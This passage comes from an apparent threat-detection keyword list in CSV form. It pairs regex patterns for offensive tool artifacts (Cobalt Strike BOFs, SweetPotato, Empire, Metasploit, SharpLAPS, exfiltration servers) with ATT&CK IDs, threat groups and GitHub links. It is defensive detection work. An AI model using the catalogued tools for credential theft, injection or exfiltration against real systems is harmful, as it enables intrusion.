T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 
- T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.sln*",".{0,1000}SweetPotato\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato-N*.exe*",".{0,1000}SweetPotato\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and 
weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*sweetsoftware/Ares*",".{0,1000}sweetsoftware\/Ares.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*swisskyrepo/SharpLAPS*",".{0,1000}swisskyrepo\/SharpLAPS.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*swisskyrepo/SSRFmap*",".{0,1000}swisskyrepo\/SSRFmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SwitchPriv.exe*",".{0,1000}SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*SxNade/Rudrastra*",".{0,1000}SxNade\/Rudrastra.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*syhunt.com/sandcat/*",".{0,1000}syhunt\.com\/sandcat\/.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*syhunt/sandcat*",".{0,1000}syhunt\/sandcat.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*syhunt-sandcat-*.exe*",".{0,1000}syhunt\-sandcat\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*synacktiv/DLHell*",".{0,1000}synacktiv\/DLHell.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*synacktiv/GPOddity*",".{0,1000}synacktiv\/GPOddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - 
TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*synacktiv/ntdissector*",".{0,1000}synacktiv\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*synacktiv/OUned*",".{0,1000}synacktiv\/OUned.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*synacktiv_gpoddity*",".{0,1000}synacktiv_gpoddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*sync-starkiller*",".{0,1000}sync\-starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - 
T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*synergy_httpx.py*",".{0,1000}synergy_httpx\.py.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*Synergy-httpx-main*",".{0,1000}Synergy\-httpx\-main.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*syscall_disable_priv *",".{0,1000}syscall_disable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*syscall_enable_priv *",".{0,1000}syscall_enable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*syscall_inject.rb*",".{0,1000}syscall_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*syscalls.asm*",".{0,1000}syscalls\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syscalls.nim*",".{0,1000}syscalls\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*syscalls_dump.*",".{0,1000}syscalls_dump\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_inject *",".{0,1000}syscalls_inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_inject.*",".{0,1000}syscalls_inject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_shinject *",".{0,1000}syscalls_shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_shspawn 
*",".{0,1000}syscalls_shspawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_spawn *",".{0,1000}syscalls_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls_spawn.*",".{0,1000}syscalls_spawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallsapcspawn.x64*",".{0,1000}syscallsapcspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscalls-asm.h*",".{0,1000}syscalls\-asm\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syscallsdump.x64*",".{0,1000}syscallsdump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 